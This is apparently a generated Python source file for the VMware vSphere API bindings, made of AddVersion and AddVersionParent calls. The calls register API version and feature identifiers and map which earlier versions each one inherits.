AddVersion("vim.version.vmxnet3UPT", "vim25", "fE5282C92", 0, "vim25")
AddVersion("vim.version.version10", "vim25", "6.0", 0, "vim25")
AddVersion("vim.version.version11", "vim25", "6.5", 0, "vim25")
AddVersion("vim.version.VMcrypt_IntegrityProtection", "vim25", "f90B801B2", 0, "vim25")
AddVersion("vim.version.version12", "vim25", "6.7", 0, "vim25")
AddVersion("vim.version.pciDeviceExt", "vim25", "fAC9F3B4D", 0, "vim25")
AddVersion("vim.version.toolsOffHost", "vim25", "f6790FE8D", 0, "vim25")
AddVersion("vim.version.hostCertificateManagement", "vim25", "f5AFFD144", 0, "vim25")
AddVersion("vim.version.vmMisc", "vim25", "fA5752719", 0, "vim25")
AddVersion("vim.version.VLCM_QuickLaunchPreload", "vim25", "fC7169CA8", 0, "vim25")
AddVersion("vim.version.LSI2PVSCSI", "vim25", "f75BC95F8", 0, "vim25")
AddVersion("vim.version.ProvisioningEventRefresh", "vim25", "fE54ABD5B", 0, "vim25")
AddVersion("vim.version.OVF_SINGLEDEPLOY_API", "vim25", "f55BDD0C7", 0, "vim25")
AddVersion("vim.version.v7_0_2_0", "vim25", "7.0.2.0", 0, "vim25")
AddVersion("vim.version.pr1803450", "vim25", "f9D6EE58D", 0, "vim25")
AddVersion("vim.version.v7_0_2_1", "vim25", "7.0.2.1", 0, "vim25")
AddVersion("vim.version.VMcrypt_OnlineVMEncryption", "vim25", "f4DF43A32", 0, "vim25")
AddVersion("vim.version.FT_VBS_SUPPORT", "vim25", "f52B55594", 0, "vim25")
AddVersion("vim.version.WCP_FaultDomains", "vim25", "f556A3D45", 0, "vim25")
AddVersion("vim.version.dnd", "vim25", "f2584E1FD", 0, "vim25")
AddVersion("vim.version.optional_virtual_disks", "vim25", "fAF52CE9B", 0, "vim25")
AddVersion("vim.version.hwh2_0", "vim25", "fBD5D595C", 0, "vim25")
AddVersion("vim.version.v7_0_1_0", "vim25", "7.0.1.0", 0, "vim25")
AddVersion("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim25", "f013EEA91", 0, "vim25")
AddVersion("vim.version.EventsOrdering", "vim25", "f4F3889C9", 0, "vim25")
AddVersion("vim.version.PMemV2", "vim25", "f6463FE0A", 0, "vim25")
AddVersion("vim.version.v7_0", "vim25", "7.0.0.0", 0, "vim25")
AddVersion("vim.version.FileLockInfo_GSS34", "vim25", "fD292327E", 0, "vim25")
AddVersion("vim.version.version8", "vim25", "5.1", 0, "vim25")
AddVersion("vim.version.version9", "vim25", "5.5", 0, "vim25")
AddVersion("vim.version.version6", "vim25", "4.1", 0, "vim25")
AddVersion("vim.version.version7", "vim25", "5.0", 0, "vim25")
AddVersion("vim.version.DiskGroupVMC", "vim25", "f025FA022", 0, "vim25")
AddVersion("vim.version.TrustAuthority_V4", "vim25", "f8EF75698", 0, "vim25")
AddVersion("vim.version.version1", "vim2", "2.0", 0, "vim25")
AddVersion("vim.version.version4", "vim25", "2.5u2server", 0, "vim25")
AddVersion("vim.version.version5", "vim25", "4.0", 0, "vim25")
AddVersion("vim.version.SRIOVValidNumVFs", "vim25", "fBE71A01E", 0, "vim25")
AddVersion("vim.version.version2", "vim25", "2.5", 0, "vim25")
AddVersion("vim.version.version3", "vim25", "2.5u2", 0, "vim25")
AddVersion("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim25", "fB702C2A8", 0, "vim25")
AddVersion("vim.version.VmxRebootPowerOff", "vim25", "f4F1633B4", 0, "vim25")
AddVersion("vim.version.ClusteredEsx_V1", "vim25", "f8B87BE62", 0, "vim25")
AddVersion("vim.version.fourKnStorageSupport", "vim25", "f25F1CD15", 0, "vim25")
AddVersion("vim.version.resetportstatistics", "vim25", "fEF47BD28", 0, "vim25")
AddVersion("vim.version.batchRenameSupport", "vim25", "f9263BFF0", 0, "vim25")
AddVersion("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "dp", "f84E89611", 0, "dp")
AddVersion("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim25", "f098CF0D6", 0, "vim25")
AddVersion("dp.version.unstable", "dp", "uA4115CFF", 0, "dp")
AddVersion("vim.version.SGX_MPA_HostReg", "vim25", "f7E551A09", 0, "vim25")
AddVersion("vim.version.GreenMetrics", "vim25", "f705133F8", 0, "vim25")
AddVersion("vim.version.hostVendorSpecificStatus", "vim25", "f5E771E6E", 0, "vim25")
AddVersion("vim.version.VMcrypt_V4", "vim25", "fF1A2B578", 0, "vim25")
AddVersion("vim.version.hostAccessManager", "vim25", "f7C32A12F", 0, "vim25")
AddVersion("vim.version.ocmSupportedForReconfigure", "vim25", "fE3F755AA", 0, "vim25")
AddVersion("dp.version.v8_0_0_0", "dp", "8.0.0.0", 0, "dp")
AddVersion("vim.version.VirtualTopo", "vim25", "f2B5B6385", 0, "vim25")
AddVersion("vim.version.Tools_Update_Health", "vim25", "f0B55775B", 0, "vim25")
AddVersion("vim.version.CPU_Scheduler_Info", "vim25", "f7BEE87FE", 0, "vim25")
AddVersion("vim.version.VM_CLONE_REKEY_TPM", "vim25", "fB4A651E5", 0, "vim25")
AddVersion("vim.version.FCD_CATALOG_HEALTH", "vim25", "fE2C114DE", 0, "vim25")
AddVersion("vim.version.smartnic_vc", "vim25", "f4C11A1E3", 0, "vim25")
AddVersion("vim.version.HWv20", "vim25", "f4D570749", 0, "vim25")
AddVersion("vim.version.unstable", "vim25", "u19B10CDC", 0, "vim25")
AddVersion("dp.version.disabled", "dp", "", 0, "dp")
AddVersion("vim.version.FT_DRS_METRO_CLUSTER", "vim25", "f96BF4016", 0, "vim25")
AddVersion("vim.version.VSAN_DeltaCompEnsureDurability", "vim25", "f82125F47", 0, "vim25")
AddVersion("vim.version.bmcInfo", "vim25", "f34D7FD26", 0, "vim25")
AddVersion("vim.version.disabled", "vim25", "", 0, "vim25")
AddVersion("vim.version.vHT", "vim25", "f498DBC25", 0, "vim25")
AddVersion("vim.version.ClusterConfigManagerV2", "vim25", "fBEB8FA9C", 0, "vim25")
AddVersion("vim.version.smartnic_network", "vim25", "fA352E3B6", 0, "vim25")
AddVersion("vim.version.DVX", "vim25", "fD51B3F10", 0, "vim25")
AddVersion("vim.version.VmcExternalStorageSupport", "vim25", "fB3D1C7C3", 0, "vim25")
AddVersion("vim.version.PodVMOnVDS", "vim25", "f543724B3", 0, "vim25")
AddVersion("vim.version.ClusterConfigManagerTransition", "vim25", "f929779EA", 0, "vim25")
AddVersion("vim.version.LiveUpdate", "vim25", "fA0392DC2", 0, "vim25")
AddVersion("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim25", "f29A03B68", 0, "vim25")
AddVersion("vim.version.VMcrypt3_KeyCustomAttribute", "vim25", "f70051077", 0, "vim25")
AddVersion("vim.version.E2ENativeNVMeSupport", "vim25", "f9130356D", 0, "vim25")
AddVersion("vim.version.FCD_PERFORMANCE", "vim25", "f5C1C764A", 0, "vim25")
AddVersion("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim25", "f45FBF959", 0, "vim25")
AddVersion("vim.version.nsx_uens_u2", "vim25", "f44FF8D6E", 0, "vim25")
AddVersionParent("vmodl.query.version.version4", "vmodl.query.version.version4")
AddVersionParent("vmodl.query.version.version4", "vmodl.query.version.version3")
AddVersionParent("vmodl.query.version.version4", "vmodl.query.version.version2")
AddVersionParent("vmodl.query.version.version4", "vmodl.query.version.version1")
AddVersionParent("vmodl.query.version.version4", "vmodl.version.version0")
AddVersionParent("vmodl.query.version.version4", "vmodl.version.version1")
AddVersionParent("vmodl.query.version.version4", "vmodl.version.version2")
AddVersionParent("vmodl.query.version.version3", "vmodl.query.version.version3")
AddVersionParent("vmodl.query.version.version3", "vmodl.query.version.version2")
AddVersionParent("vmodl.query.version.version3", "vmodl.query.version.version1")
AddVersionParent("vmodl.query.version.version3", "vmodl.version.version0")
AddVersionParent("vmodl.query.version.version3", "vmodl.version.version1")
AddVersionParent("vmodl.query.version.version2", "vmodl.query.version.version2")
AddVersionParent("vmodl.query.version.version2", "vmodl.query.version.version1")
AddVersionParent("vmodl.query.version.version2", "vmodl.version.version0")
AddVersionParent("vmodl.query.version.version2", "vmodl.version.version1")
AddVersionParent("vmodl.query.version.version1", "vmodl.query.version.version1")
AddVersionParent("vmodl.query.version.version1", "vmodl.version.version0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.query.version.version4")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.query.version.version3")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.query.version.version2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.query.version.version1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.pcieHotPlugOfFPT")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.version.version0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.version.version1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.version.version2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v6_9_1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v6_8_7")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version13")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version14")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version15")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version10")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version11")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version12")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.v7_0")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version8")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version9")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version6")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version7")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version1")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version4")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version5")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version2")
AddVersionParent("vim.version.pcieHotPlugOfFPT", "vim.version.version3")
AddVersionParent("vim.version.pr1429825", "vmodl.query.version.version4")
AddVersionParent("vim.version.pr1429825", "vmodl.query.version.version3")
AddVersionParent("vim.version.pr1429825", "vmodl.query.version.version2")
AddVersionParent("vim.version.pr1429825", "vmodl.query.version.version1")
AddVersionParent("vim.version.pr1429825", "vim.version.pr1429825")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.pr1429825", "vmodl.version.version0")
AddVersionParent("vim.version.pr1429825", "vmodl.version.version1")
AddVersionParent("vim.version.pr1429825", "vmodl.version.version2")
AddVersionParent("vim.version.pr1429825", "vim.version.v6_9_1")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.pr1429825", "vim.version.v6_8_7")
AddVersionParent("vim.version.pr1429825", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.pr1429825", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.pr1429825", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.pr1429825", "vim.version.version13")
AddVersionParent("vim.version.pr1429825", "vim.version.version14")
AddVersionParent("vim.version.pr1429825", "vim.version.version15")
AddVersionParent("vim.version.pr1429825", "vim.version.version10")
AddVersionParent("vim.version.pr1429825", "vim.version.version11")
AddVersionParent("vim.version.pr1429825", "vim.version.version12")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.pr1429825", "vim.version.v7_0")
AddVersionParent("vim.version.pr1429825", "vim.version.version8")
AddVersionParent("vim.version.pr1429825", "vim.version.version9")
AddVersionParent("vim.version.pr1429825", "vim.version.version6")
AddVersionParent("vim.version.pr1429825", "vim.version.version7")
AddVersionParent("vim.version.pr1429825", "vim.version.version1")
AddVersionParent("vim.version.pr1429825", "vim.version.version4")
AddVersionParent("vim.version.pr1429825", "vim.version.version5")
AddVersionParent("vim.version.pr1429825", "vim.version.version2")
AddVersionParent("vim.version.pr1429825", "vim.version.version3")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version4")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version3")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.query.version.version1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.version.version0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.version.version1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.version.version2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v6_9_1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v6_8_7")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version13")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version14")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version15")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version10")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version11")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version12")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.v7_0")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version8")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version9")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version6")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version7")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version1")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version4")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version5")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version2")
AddVersionParent("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.query.version.version4")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.query.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.query.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.query.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "dp.version.VSPHERE_DP_TELEMETRY")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_1_1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.version.version0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "dp.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v6_9_1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_0_2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v6_8_7")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v8_0_0_0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_3_1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_3_2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_3_0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version13")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version14")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version15")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version10")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version11")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version12")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_2_0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_2_1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0_1_0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.v7_0")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version8")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version9")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version6")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version7")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version4")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version5")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "vim.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_TELEMETRY", "dp.version.v8_0_0_0")
AddVersionParent("vim.version.MemoryTiering", "vmodl.query.version.version4")
AddVersionParent("vim.version.MemoryTiering", "vmodl.query.version.version3")
AddVersionParent("vim.version.MemoryTiering", "vmodl.query.version.version2")
AddVersionParent("vim.version.MemoryTiering", "vmodl.query.version.version1")
AddVersionParent("vim.version.MemoryTiering", "vim.version.MemoryTiering")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.MemoryTiering", "vmodl.version.version0")
AddVersionParent("vim.version.MemoryTiering", "vmodl.version.version1")
AddVersionParent("vim.version.MemoryTiering", "vmodl.version.version2")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v6_9_1")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v6_8_7")
AddVersionParent("vim.version.MemoryTiering", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.MemoryTiering", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version13")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version14")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version15")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version10")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version11")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version12")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.MemoryTiering", "vim.version.v7_0")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version8")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version9")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version6")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version7")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version1")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version4")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version5")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version2")
AddVersionParent("vim.version.MemoryTiering", "vim.version.version3")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_1_1", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version13")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version14")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version15")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version10")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version11")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version12")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version8")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version9")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version6")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version7")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version1")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version4")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version5")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version2")
AddVersionParent("vim.version.v7_0_1_1", "vim.version.version3")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.query.version.version4")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.query.version.version3")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.query.version.version2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.query.version.version1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.FCD_VRA_SUPPORT")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.version.version0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.version.version1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.version.version2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v6_9_1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v6_8_7")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version13")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version14")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version15")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version10")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version11")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version12")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.v7_0")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version8")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version9")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version6")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version7")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version1")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version4")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version5")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version2")
AddVersionParent("vim.version.FCD_VRA_SUPPORT", "vim.version.version3")
AddVersionParent("vim.version.guestDetailedData", "vmodl.query.version.version4")
AddVersionParent("vim.version.guestDetailedData", "vmodl.query.version.version3")
AddVersionParent("vim.version.guestDetailedData", "vmodl.query.version.version2")
AddVersionParent("vim.version.guestDetailedData", "vmodl.query.version.version1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.guestDetailedData")
AddVersionParent("vim.version.guestDetailedData", "vmodl.version.version0")
AddVersionParent("vim.version.guestDetailedData", "vmodl.version.version1")
AddVersionParent("vim.version.guestDetailedData", "vmodl.version.version2")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v6_9_1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v6_8_7")
AddVersionParent("vim.version.guestDetailedData", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.guestDetailedData", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version13")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version14")
